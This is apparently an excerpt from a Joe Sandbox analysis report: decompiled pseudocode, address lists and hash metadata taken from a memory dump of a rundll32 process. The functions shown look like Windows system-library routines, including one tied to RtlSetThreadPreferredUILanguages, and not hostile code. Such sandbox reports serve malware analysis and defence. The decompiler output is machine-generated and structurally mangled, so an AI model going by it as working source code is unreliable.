                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PATH
                                                                                                                • API String ID: 0-1036084923
                                                                                                                • Opcode ID: 896fee79ac82fb4c2f676179dab91a01cfdef76bc3036f3439c40eb0a725c9ce
                                                                                                                • Instruction ID: 928fef6c52e57c587f0edd40b10cfd6655a0660b750b6024f1bb34b1b33c4640
                                                                                                                • Opcode Fuzzy Hash: 896fee79ac82fb4c2f676179dab91a01cfdef76bc3036f3439c40eb0a725c9ce
                                                                                                                • Instruction Fuzzy Hash: 73C18075E00219EBEF24DF99D881ABEB7B1FF48B05F14406AE501AB350E774B942CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E0443FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                                                				char _v5;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v17;
                                                                                                                				char _v20;
                                                                                                                				signed int _v24;
                                                                                                                				char _v28;
                                                                                                                				char _v32;
                                                                                                                				signed int _v40;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t73;
                                                                                                                				intOrPtr* _t75;
                                                                                                                				signed int _t77;
                                                                                                                				signed int _t79;
                                                                                                                				signed int _t81;
                                                                                                                				intOrPtr _t83;
                                                                                                                				intOrPtr _t85;
                                                                                                                				intOrPtr _t86;
                                                                                                                				signed int _t91;
                                                                                                                				signed int _t94;
                                                                                                                				signed int _t95;
                                                                                                                				signed int _t96;
                                                                                                                				signed int _t106;
                                                                                                                				signed int _t108;
                                                                                                                				signed int _t114;
                                                                                                                				signed int _t116;
                                                                                                                				signed int _t118;
                                                                                                                				signed int _t122;
                                                                                                                				signed int _t123;
                                                                                                                				void* _t129;
                                                                                                                				signed int _t130;
                                                                                                                				void* _t132;
                                                                                                                				intOrPtr* _t134;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t141;
                                                                                                                				signed int _t147;
                                                                                                                				intOrPtr _t153;
                                                                                                                				signed int _t154;
                                                                                                                				signed int _t155;
                                                                                                                				signed int _t170;
                                                                                                                				void* _t174;
                                                                                                                				signed int _t176;
                                                                                                                				signed int _t177;
                                                                                                                
                                                                                                                				_t129 = __ebx;
                                                                                                                				_push(_t132);
                                                                                                                				_push(__esi);
                                                                                                                				_t174 = _t132;
                                                                                                                				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                                                				if(_t73 >= 0) {
                                                                                                                					L5:
                                                                                                                					return _t73;
                                                                                                                				} else {
                                                                                                                					E0441EEF0(0x44f7b60);
                                                                                                                					_t134 =  *0x44f7b84; // 0x77e17b80
                                                                                                                					_t2 = _t174 + 0x24; // 0x24
                                                                                                                					_t75 = _t2;
                                                                                                                					if( *_t134 != 0x44f7b80) {
                                                                                                                						_push(3);
                                                                                                                						asm("int 0x29");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						_push(0x44f7b60);
                                                                                                                						_t170 = _v8;
                                                                                                                						_v28 = 0;
                                                                                                                						_v40 = 0;
                                                                                                                						_v24 = 0;
                                                                                                                						_v17 = 0;
                                                                                                                						_v32 = 0;
                                                                                                                						__eflags = _t170 & 0xffff7cf2;
                                                                                                                						if((_t170 & 0xffff7cf2) != 0) {
                                                                                                                							L43:
                                                                                                                							_t77 = 0xc000000d;
                                                                                                                						} else {
                                                                                                                							_t79 = _t170 & 0x0000000c;
                                                                                                                							__eflags = _t79;
                                                                                                                							if(_t79 != 0) {
                                                                                                                								__eflags = _t79 - 0xc;
                                                                                                                								if(_t79 == 0xc) {
                                                                                                                									goto L43;
                                                                                                                								} else {
                                                                                                                									goto L9;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t170 = _t170 | 0x00000008;
                                                                                                                								__eflags = _t170;
                                                                                                                								L9:
                                                                                                                								_t81 = _t170 & 0x00000300;
                                                                                                                								__eflags = _t81 - 0x300;
                                                                                                                								if(_t81 == 0x300) {
                                                                                                                									goto L43;
                                                                                                                								} else {
                                                                                                                									_t138 = _t170 & 0x00000001;
                                                                                                                									__eflags = _t138;
                                                                                                                									_v24 = _t138;
                                                                                                                									if(_t138 != 0) {
                                                                                                                										__eflags = _t81;
                                                                                                                										if(_t81 != 0) {
                                                                                                                											goto L43;
                                                                                                                										} else {
                                                                                                                											goto L11;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										L11:
                                                                                                                										_push(_t129);
                                                                                                                										_t77 = E04416D90( &_v20);
                                                                                                                										_t130 = _t77;
                                                                                                                										__eflags = _t130;
                                                                                                                										if(_t130 >= 0) {
                                                                                                                											_push(_t174);
                                                                                                                											__eflags = _t170 & 0x00000301;
                                                                                                                											if((_t170 & 0x00000301) == 0) {
                                                                                                                												_t176 = _a8;
                                                                                                                												__eflags = _t176;
                                                                                                                												if(__eflags == 0) {
                                                                                                                													L64:
                                                                                                                													_t83 =  *[fs:0x18];
                                                                                                                													_t177 = 0;
                                                                                                                													__eflags =  *(_t83 + 0xfb8);
                                                                                                                													if( *(_t83 + 0xfb8) != 0) {
                                                                                                                														E044176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                                                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                                                													}
                                                                                                                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                                                													goto L15;
                                                                                                                												} else {
                                                                                                                													asm("sbb edx, edx");
                                                                                                                													_t114 = E044A8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                                                													__eflags = _t114;
                                                                                                                													if(_t114 < 0) {
                                                                                                                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                                                														E0440B150();
                                                                                                                													}
                                                                                                                													_t116 = E044A6D81(_t176,  &_v16);
                                                                                                                													__eflags = _t116;
                                                                                                                													if(_t116 >= 0) {
                                                                                                                														__eflags = _v16 - 2;
                                                                                                                														if(_v16 < 2) {
                                                                                                                															L56:
                                                                                                                															_t118 = E044175CE(_v20, 5, 0);
                                                                                                                															__eflags = _t118;
                                                                                                                															if(_t118 < 0) {
                                                                                                                																L67:
                                                                                                                																_t130 = 0xc0000017;
                                                                                                                																goto L32;
                                                                                                                															} else {
                                                                                                                																__eflags = _v12;
                                                                                                                																if(_v12 == 0) {
                                                                                                                																	goto L67;
                                                                                                                																} else {
                                                                                                                																	_t153 =  *0x44f8638; // 0x35c188
                                                                                                                																	_t122 = L044138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                                                																	_t154 = _v12;
                                                                                                                																	_t130 = _t122;
                                                                                                                																	__eflags = _t130;
                                                                                                                																	if(_t130 >= 0) {
                                                                                                                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                                                																		__eflags = _t123;
                                                                                                                																		if(_t123 != 0) {
                                                                                                                																			_t155 = _a12;
                                                                                                                																			__eflags = _t155;
                                                                                                                																			if(_t155 != 0) {
                                                                                                                																				 *_t155 = _t123;
                                                                                                                																			}
                                                                                                                																			goto L64;
                                                                                                                																		} else {
                                                                                                                																			E044176E2(_t154);
                                                                                                                																			goto L41;
                                                                                                                																		}
                                                                                                                																	} else {
                                                                                                                																		E044176E2(_t154);
                                                                                                                																		_t177 = 0;
                                                                                                                																		goto L18;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															}
                                                                                                                														} else {
                                                                                                                															__eflags =  *_t176;
                                                                                                                															if( *_t176 != 0) {
                                                                                                                																goto L56;
                                                                                                                															} else {
                                                                                                                																__eflags =  *(_t176 + 2);
                                                                                                                																if( *(_t176 + 2) == 0) {
                                                                                                                																	goto L64;
                                                                                                                																} else {
                                                                                                                																	goto L56;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													} else {
                                                                                                                														_t130 = 0xc000000d;
                                                                                                                														goto L32;
                                                                                                                													}
                                                                                                                												}
                                                                                                                												goto L35;
                                                                                                                											} else {
                                                                                                                												__eflags = _a8;
                                                                                                                												if(_a8 != 0) {
                                                                                                                													_t77 = 0xc000000d;
                                                                                                                												} else {
                                                                                                                													_v5 = 1;
                                                                                                                													L0443FCE3(_v20, _t170);
                                                                                                                													_t177 = 0;
                                                                                                                													__eflags = 0;
                                                                                                                													L15:
                                                                                                                													_t85 =  *[fs:0x18];
                                                                                                                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                                                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                                                														L18:
                                                                                                                														__eflags = _t130;
                                                                                                                														if(_t130 != 0) {
                                                                                                                															goto L32;
                                                                                                                														} else {
                                                                                                                															__eflags = _v5 - _t130;
                                                                                                                															if(_v5 == _t130) {
                                                                                                                																goto L32;
                                                                                                                															} else {
                                                                                                                																_t86 =  *[fs:0x18];
                                                                                                                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                                                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                                                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                                                																}
                                                                                                                																__eflags = _t177;
                                                                                                                																if(_t177 == 0) {
                                                                                                                																	L31:
                                                                                                                																	__eflags = 0;
                                                                                                                																	L044170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                                                																	goto L32;
                                                                                                                																} else {
                                                                                                                																	__eflags = _v24;
                                                                                                                																	_t91 =  *(_t177 + 0x20);
                                                                                                                																	if(_v24 != 0) {
                                                                                                                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                                                																		goto L31;
                                                                                                                																	} else {
                                                                                                                																		_t141 = _t91 & 0x00000040;
                                                                                                                																		__eflags = _t170 & 0x00000100;
                                                                                                                																		if((_t170 & 0x00000100) == 0) {
                                                                                                                																			__eflags = _t141;
                                                                                                                																			if(_t141 == 0) {
                                                                                                                																				L74:
                                                                                                                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                                                																				goto L27;
                                                                                                                																			} else {
                                                                                                                																				_t177 = E0443FD22(_t177);
                                                                                                                																				__eflags = _t177;
                                                                                                                																				if(_t177 == 0) {
                                                                                                                																					goto L42;
                                                                                                                																				} else {
                                                                                                                																					_t130 = E0443FD9B(_t177, 0, 4);
                                                                                                                																					__eflags = _t130;
                                                                                                                																					if(_t130 != 0) {
                                                                                                                																						goto L42;
                                                                                                                																					} else {
                                                                                                                																						_t68 = _t177 + 0x20;
                                                                                                                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                                																						__eflags =  *_t68;
                                                                                                                																						_t91 =  *(_t177 + 0x20);
                                                                                                                																						goto L74;
                                                                                                                																					}
                                                                                                                																				}
                                                                                                                																			}
                                                                                                                																			goto L35;
                                                                                                                																		} else {
                                                                                                                																			__eflags = _t141;
                                                                                                                																			if(_t141 != 0) {
                                                                                                                																				_t177 = E0443FD22(_t177);
                                                                                                                																				__eflags = _t177;
                                                                                                                																				if(_t177 == 0) {
                                                                                                                																					L42:
                                                                                                                																					_t77 = 0xc0000001;
                                                                                                                																					goto L33;
                                                                                                                																				} else {
                                                                                                                																					_t130 = E0443FD9B(_t177, 0, 4);
                                                                                                                																					__eflags = _t130;
                                                                                                                																					if(_t130 != 0) {
                                                                                                                																						goto L42;
                                                                                                                																					} else {
                                                                                                                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                                																						_t91 =  *(_t177 + 0x20);
                                                                                                                																						goto L26;
                                                                                                                																					}
                                                                                                                																				}
                                                                                                                																				goto L35;
                                                                                                                																			} else {
                                                                                                                																				L26:
                                                                                                                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                                                																				__eflags = _t94;
                                                                                                                																				L27:
                                                                                                                																				 *(_t177 + 0x20) = _t94;
                                                                                                                																				__eflags = _t170 & 0x00008000;
                                                                                                                																				if((_t170 & 0x00008000) != 0) {
                                                                                                                																					_t95 = _a12;
                                                                                                                																					__eflags = _t95;
                                                                                                                																					if(_t95 != 0) {
                                                                                                                																						_t96 =  *_t95;
                                                                                                                																						__eflags = _t96;
                                                                                                                																						if(_t96 != 0) {
                                                                                                                																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                                                																							_t40 = _t177 + 0x20;
                                                                                                                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                                                																							__eflags =  *_t40;
                                                                                                                																						}
                                                                                                                																					}
                                                                                                                																				}
                                                                                                                																				goto L31;
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													} else {
                                                                                                                														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                                                														_t106 =  *(_t147 + 0x20);
                                                                                                                														__eflags = _t106 & 0x00000040;
                                                                                                                														if((_t106 & 0x00000040) != 0) {
                                                                                                                															_t147 = E0443FD22(_t147);
                                                                                                                															__eflags = _t147;
                                                                                                                															if(_t147 == 0) {
                                                                                                                																L41:
                                                                                                                																_t130 = 0xc0000001;
                                                                                                                																L32:
                                                                                                                																_t77 = _t130;
                                                                                                                																goto L33;
                                                                                                                															} else {
                                                                                                                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                                                																_t106 =  *(_t147 + 0x20);
                                                                                                                																goto L17;
                                                                                                                															}
                                                                                                                															goto L35;
                                                                                                                														} else {
                                                                                                                															L17:
                                                                                                                															_t108 = _t106 | 0x00000080;
                                                                                                                															__eflags = _t108;
                                                                                                                															 *(_t147 + 0x20) = _t108;
                                                                                                                															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                                                															goto L18;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                											L33:
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L35:
                                                                                                                						return _t77;
                                                                                                                					} else {
                                                                                                                						 *_t75 = 0x44f7b80;
                                                                                                                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                                                						 *_t134 = _t75;
                                                                                                                						 *0x44f7b84 = _t75;
                                                                                                                						_t73 = E0441EB70(_t134, 0x44f7b60);
                                                                                                                						if( *0x44f7b20 != 0) {
                                                                                                                							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                                                							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                                                								_t73 = E0441FF60( *0x44f7b20);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}

















































                                                                                                                0x0447be66
                                                                                                                0x0447be66
                                                                                                                0x0447be7f
                                                                                                                0x0447be84
                                                                                                                0x0447be87
                                                                                                                0x0447be89
                                                                                                                0x0447be8b
                                                                                                                0x0447be99
                                                                                                                0x0447be9d
                                                                                                                0x0447bea0
                                                                                                                0x0447beac
                                                                                                                0x0447beaf
                                                                                                                0x0447beb1
                                                                                                                0x0447beb3
                                                                                                                0x0447beb3
                                                                                                                0x00000000
                                                                                                                0x0447bea2
                                                                                                                0x0447bea2
                                                                                                                0x00000000
                                                                                                                0x0447bea2
                                                                                                                0x0447be8d
                                                                                                                0x0447be8d
                                                                                                                0x0447be92
                                                                                                                0x00000000
                                                                                                                0x0447be92
                                                                                                                0x0447be8b
                                                                                                                0x0447be60
                                                                                                                0x0447be3b
                                                                                                                0x0447be3b
                                                                                                                0x0447be3e
                                                                                                                0x00000000
                                                                                                                0x0447be40
                                                                                                                0x0447be40
                                                                                                                0x0447be44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447be44
                                                                                                                0x0447be3e
                                                                                                                0x0447be29
                                                                                                                0x0447be29
                                                                                                                0x00000000
                                                                                                                0x0447be29
                                                                                                                0x0447be27
                                                                                                                0x00000000
                                                                                                                0x0443fba7
                                                                                                                0x0443fba7
                                                                                                                0x0443fbab
                                                                                                                0x0447bf02
                                                                                                                0x0443fbb1
                                                                                                                0x0443fbb1
                                                                                                                0x0443fbb8
                                                                                                                0x0443fbbd
                                                                                                                0x0443fbbd
                                                                                                                0x0443fbbf
                                                                                                                0x0443fbbf
                                                                                                                0x0443fbc5
                                                                                                                0x0443fbcb
                                                                                                                0x0443fbf8
                                                                                                                0x0443fbf8
                                                                                                                0x0443fbfa
                                                                                                                0x00000000
                                                                                                                0x0443fc00
                                                                                                                0x0443fc00
                                                                                                                0x0443fc03
                                                                                                                0x00000000
                                                                                                                0x0443fc09
                                                                                                                0x0443fc09
                                                                                                                0x0443fc0f
                                                                                                                0x0443fc15
                                                                                                                0x0443fc23
                                                                                                                0x0443fc23
                                                                                                                0x0443fc25
                                                                                                                0x0443fc27
                                                                                                                0x0443fc75
                                                                                                                0x0443fc7c
                                                                                                                0x0443fc84
                                                                                                                0x00000000
                                                                                                                0x0443fc29
                                                                                                                0x0443fc29
                                                                                                                0x0443fc2d
                                                                                                                0x0443fc30
                                                                                                                0x0447bf0f
                                                                                                                0x00000000
                                                                                                                0x0443fc36
                                                                                                                0x0443fc38
                                                                                                                0x0443fc3b
                                                                                                                0x0443fc41
                                                                                                                0x0447bf17
                                                                                                                0x0447bf19
                                                                                                                0x0447bf48
                                                                                                                0x0447bf4b
                                                                                                                0x00000000
                                                                                                                0x0447bf1b
                                                                                                                0x0447bf22
                                                                                                                0x0447bf24
                                                                                                                0x0447bf26
                                                                                                                0x00000000
                                                                                                                0x0447bf2c
                                                                                                                0x0447bf37
                                                                                                                0x0447bf39
                                                                                                                0x0447bf3b
                                                                                                                0x00000000
                                                                                                                0x0447bf41
                                                                                                                0x0447bf41
                                                                                                                0x0447bf41
                                                                                                                0x0447bf41
                                                                                                                0x0447bf45
                                                                                                                0x00000000
                                                                                                                0x0447bf45
                                                                                                                0x0447bf3b
                                                                                                                0x0447bf26
                                                                                                                0x00000000
                                                                                                                0x0443fc47
                                                                                                                0x0443fc47
                                                                                                                0x0443fc49
                                                                                                                0x0443fcb2
                                                                                                                0x0443fcb4
                                                                                                                0x0443fcb6
                                                                                                                0x0443fcdc
                                                                                                                0x0443fcdc
                                                                                                                0x00000000
                                                                                                                0x0443fcb8
                                                                                                                0x0443fcc3
                                                                                                                0x0443fcc5
                                                                                                                0x0443fcc7
                                                                                                                0x00000000
                                                                                                                0x0443fcc9
                                                                                                                0x0443fcc9
                                                                                                                0x0443fccd
                                                                                                                0x00000000
                                                                                                                0x0443fccd
                                                                                                                0x0443fcc7
                                                                                                                0x00000000
                                                                                                                0x0443fc4b
                                                                                                                0x0443fc4b
                                                                                                                0x0443fc4e
                                                                                                                0x0443fc4e
                                                                                                                0x0443fc51
                                                                                                                0x0443fc51
                                                                                                                0x0443fc54
                                                                                                                0x0443fc5a
                                                                                                                0x0443fc5c
                                                                                                                0x0443fc5f
                                                                                                                0x0443fc61
                                                                                                                0x0443fc63
                                                                                                                0x0443fc65
                                                                                                                0x0443fc67
                                                                                                                0x0443fc6e
                                                                                                                0x0443fc72
                                                                                                                0x0443fc72
                                                                                                                0x0443fc72
                                                                                                                0x0443fc72
                                                                                                                0x0443fc67
                                                                                                                0x0443fc61
                                                                                                                0x00000000
                                                                                                                0x0443fc5a
                                                                                                                0x0443fc49
                                                                                                                0x0443fc41
                                                                                                                0x0443fc30
                                                                                                                0x0443fc27
                                                                                                                0x0443fc03
                                                                                                                0x0443fbcd
                                                                                                                0x0443fbd3
                                                                                                                0x0443fbd9
                                                                                                                0x0443fbdc
                                                                                                                0x0443fbde
                                                                                                                0x0443fc99
                                                                                                                0x0443fc9b
                                                                                                                0x0443fc9d
                                                                                                                0x0443fcd5
                                                                                                                0x0443fcd5
                                                                                                                0x0443fc89
                                                                                                                0x0443fc89
                                                                                                                0x00000000
                                                                                                                0x0443fc9f
                                                                                                                0x0443fc9f
                                                                                                                0x0443fca3
                                                                                                                0x00000000
                                                                                                                0x0443fca3
                                                                                                                0x00000000
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe9
                                                                                                                0x0443fbf2
                                                                                                                0x00000000
                                                                                                                0x0443fbf2
                                                                                                                0x0443fbde
                                                                                                                0x0443fbcb
                                                                                                                0x0443fbab
                                                                                                                0x0443fc8b
                                                                                                                0x0443fc8b
                                                                                                                0x0443fc8c
                                                                                                                0x0443fb80
                                                                                                                0x0443fb72
                                                                                                                0x0443fb5e
                                                                                                                0x0443fc8d
                                                                                                                0x0443fc91
                                                                                                                0x0443fadf
                                                                                                                0x0443fadf
                                                                                                                0x0443fae1
                                                                                                                0x0443fae4
                                                                                                                0x0443fae7
                                                                                                                0x0443faec
                                                                                                                0x0443faf8
                                                                                                                0x0443fb00
                                                                                                                0x0443fb07
                                                                                                                0x0443fb0f
                                                                                                                0x0443fb0f
                                                                                                                0x0443fb07
                                                                                                                0x00000000
                                                                                                                0x0443faf8
                                                                                                                0x0443fadd

                                                                                                                Strings
                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0447BE0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                • API String ID: 0-865735534
                                                                                                                • Opcode ID: 374afe1fee4ec1bf183cf49a57b984d272d13af64f1ef3e0eee80f6aee9524b4
                                                                                                                • Instruction ID: 7226d6103d65895179a8c4b1fc02f14d05117850c201ee70a1ba1c3df442db02
                                                                                                                • Opcode Fuzzy Hash: 374afe1fee4ec1bf183cf49a57b984d272d13af64f1ef3e0eee80f6aee9524b4
                                                                                                                • Instruction Fuzzy Hash: EBA1CF71F006458FEF25DF65C450BAAB3A4FB48B19F04456FE9069B791EB34F80A8B80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E04402D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                                                				signed char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				signed int _v52;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t55;
                                                                                                                				signed int _t57;
                                                                                                                				signed int _t58;
                                                                                                                				char* _t62;
                                                                                                                				signed char* _t63;
                                                                                                                				signed char* _t64;
                                                                                                                				signed int _t67;
                                                                                                                				signed int _t72;
                                                                                                                				signed int _t77;
                                                                                                                				signed int _t78;
                                                                                                                				signed int _t88;
                                                                                                                				intOrPtr _t89;
                                                                                                                				signed char _t93;
                                                                                                                				signed int _t97;
                                                                                                                				signed int _t98;
                                                                                                                				signed int _t102;
                                                                                                                				signed int _t103;
                                                                                                                				intOrPtr _t104;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t106;
                                                                                                                				signed char _t109;
                                                                                                                				signed int _t111;
                                                                                                                				void* _t116;
                                                                                                                
                                                                                                                				_t102 = __edi;
                                                                                                                				_t97 = __edx;
                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                				_t55 =  *[fs:0x18];
                                                                                                                				_t109 = __ecx;
                                                                                                                				_v8 = __edx;
                                                                                                                				_t86 = 0;
                                                                                                                				_v32 = _t55;
                                                                                                                				_v24 = 0;
                                                                                                                				_push(__edi);
                                                                                                                				if(__ecx == 0x44f5350) {
                                                                                                                					_t86 = 1;
                                                                                                                					_v24 = 1;
                                                                                                                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                                                				}
                                                                                                                				_t103 = _t102 | 0xffffffff;
                                                                                                                				if( *0x44f7bc8 != 0) {
                                                                                                                					_push(0xc000004b);
                                                                                                                					_push(_t103);
                                                                                                                					E044497C0();
                                                                                                                				}
                                                                                                                				if( *0x44f79c4 != 0) {
                                                                                                                					_t57 = 0;
                                                                                                                				} else {
                                                                                                                					_t57 = 0x44f79c8;
                                                                                                                				}
                                                                                                                				_v16 = _t57;
                                                                                                                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                                                					_t93 = _t109;
                                                                                                                					L23();
                                                                                                                				}
                                                                                                                				_t58 =  *_t109;
                                                                                                                				if(_t58 == _t103) {
                                                                                                                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                                                					_t58 = _t103;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t93 = _t109;
                                                                                                                						E04431624(_t86, __eflags);
                                                                                                                						_t58 =  *_t109;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				if(_t58 != _t103) {
                                                                                                                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                                                				}
                                                                                                                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                                                				_t88 = _v16;
                                                                                                                				_v28 = _t104;
                                                                                                                				L9:
                                                                                                                				while(1) {
                                                                                                                					if(E04427D50() != 0) {
                                                                                                                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                                                					} else {
                                                                                                                						_t62 = 0x7ffe0382;
                                                                                                                					}
                                                                                                                					if( *_t62 != 0) {
                                                                                                                						_t63 =  *[fs:0x30];
                                                                                                                						__eflags = _t63[0x240] & 0x00000002;
                                                                                                                						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                                                							_t93 = _t109;
                                                                                                                							E0449FE87(_t93);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_t104 != 0xffffffff) {
                                                                                                                						_push(_t88);
                                                                                                                						_push(0);
                                                                                                                						_push(_t104);
                                                                                                                						_t64 = E04449520();
                                                                                                                						goto L15;
                                                                                                                					} else {
                                                                                                                						while(1) {
                                                                                                                							_t97 =  &_v8;
                                                                                                                							_t64 = E0443E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                                                							if(_t64 == 0x102) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t93 =  *(_t109 + 4);
                                                                                                                							_v8 = _t93;
                                                                                                                							if((_t93 & 0x00000002) != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							L15:
                                                                                                                							if(_t64 == 0x102) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t89 = _v24;
                                                                                                                							if(_t64 < 0) {
                                                                                                                								L0445DF30(_t93, _t97, _t64);
                                                                                                                								_push(_t93);
                                                                                                                								_t98 = _t97 | 0xffffffff;
                                                                                                                								__eflags =  *0x44f6901;
                                                                                                                								_push(_t109);
                                                                                                                								_v52 = _t98;
                                                                                                                								if( *0x44f6901 != 0) {
                                                                                                                									_push(0);
                                                                                                                									_push(1);
                                                                                                                									_push(0);
                                                                                                                									_push(0x100003);
                                                                                                                									_push( &_v12);
                                                                                                                									_t72 = E04449980();
                                                                                                                									__eflags = _t72;
                                                                                                                									if(_t72 < 0) {
                                                                                                                										_v12 = _t98 | 0xffffffff;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								asm("lock cmpxchg [ecx], edx");
                                                                                                                								_t111 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                								if(0 != 0) {
                                                                                                                									__eflags = _v12 - 0xffffffff;
                                                                                                                									if(_v12 != 0xffffffff) {
                                                                                                                										_push(_v12);
                                                                                                                										E044495D0();
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_t111 = _v12;
                                                                                                                								}
                                                                                                                								return _t111;
                                                                                                                							} else {
                                                                                                                								if(_t89 != 0) {
                                                                                                                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                                                									_t77 = E04427D50();
                                                                                                                									__eflags = _t77;
                                                                                                                									if(_t77 == 0) {
                                                                                                                										_t64 = 0x7ffe0384;
                                                                                                                									} else {
                                                                                                                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                									}
                                                                                                                									__eflags =  *_t64;
                                                                                                                									if( *_t64 != 0) {
                                                                                                                										_t64 =  *[fs:0x30];
